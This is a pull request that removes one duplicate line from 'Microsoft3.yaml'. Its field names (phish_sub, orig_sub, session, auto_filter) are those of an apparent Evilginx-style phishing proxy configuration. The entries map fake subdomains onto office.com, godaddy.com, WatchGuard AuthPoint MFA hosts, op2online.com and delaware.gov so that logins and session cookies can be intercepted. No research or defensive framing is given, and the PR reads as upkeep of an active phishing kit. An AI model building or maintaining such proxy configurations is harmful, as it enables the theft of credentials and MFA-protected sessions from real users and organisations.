### PR TITLE
fix: remove duplicate poxy_hosts entry

### DIFF
--- a/Microsoft3.yaml
+++ b/Microsoft3.yaml
@@ -22,7 +22,6 @@ proxy_hosts:
   - {phish_sub: '', orig_sub: '', domain: 'office.com', session: true, is_landing: false, auto_filter: true}
   - {phish_sub: '', orig_sub: '', domain: 'godaddy.com', session: true, is_landing: false, auto_filter: true}
   - { phish_sub: "sautsa", orig_sub: "sp.authpoint.usa", domain: "cloud.watchguard.com", session: true, is_landing: false, auto_filter: false }
-  - { phish_sub: "sautsa", orig_sub: "sp.authpoint.usa", domain: "cloud.watchguard.com", session: true, is_landing: false, auto_filter: false }
   - { phish_sub: "usaa", orig_sub: "usa", domain: "authpoint.watchguard.com", session: true, is_landing: false, auto_filter: false }
   - { phish_sub: "autsh", orig_sub: "auth", domain: "op2online.com", session: true, is_landing: false, auto_filter: false }
   - { phish_sub: "isd", orig_sub: "id", domain: "delaware.gov", session: true, is_landing: false, auto_filter: false }


### PR DESCRIPTION
This pull request includes a small change to the `Microsoft3.yaml` file. The change removes a duplicate entry in the `proxy_hosts` list.

* [`Microsoft3.yaml`](diffhunk://#diff-ec2a49563a5a6d5cd84ac6d086232e2f8753c137b785dcfcaf0f225c1e676cc5L25): Removed a duplicate entry for `cloud.watchguard.com` with `phish_sub: "sautsa"` and `orig_sub: "sp.authpoint.usa"`.